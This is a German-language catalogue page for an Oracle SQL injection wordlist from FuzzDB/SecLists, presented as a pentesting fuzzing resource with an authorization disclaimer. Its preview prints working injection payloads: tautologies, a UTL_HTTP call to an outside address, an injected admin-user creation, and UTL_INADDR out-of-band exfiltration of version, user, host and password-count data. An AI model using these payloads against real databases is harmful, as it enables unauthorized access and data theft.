Skip to content
cyberwordlists
Fuzzing7.7 KB

Oracle SQL Injection (FuzzDB)

Oracle-spezifische SQL-Injection-Payloads, die UTL_HTTP, UTL_INADDR-Out-of-Band-Exfiltration und PL/SQL-Konstrukte nutzen. Zum Untersuchen von Oracle-DB-Back-Ends.

Quelle ansehen
Größe
7.7 KB
Kategorie
Fuzzing
Quelle
danielmiessler/SecLists
Lizenz
MIT
Empfohlene Tools
sqlmapburp

Vorschau

Die ersten 15 Einträge. Lade die vollständige Liste (7.7 KB) herunter oder kopiere sie über die Schaltflächen oben.

>head oracle-sqli-fuzzdb.txt7.7 KB
# contains statements from jbrofuzz
’ or ‘1’=’1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i

Oracle-spezifische SQL-Injection-Payloads, die UTL_HTTP, UTL_INADDR-Out-of-Band-Exfiltration und PL/SQL-Konstrukte nutzen. Zum Untersuchen von Oracle-DB-Back-Ends.

Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 7.7 KB und harmoniert gut mit Tools wie sqlmap, burp. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.

Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt von ihrer Ursprungsquelle auf GitHub bereitgestellt.

Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.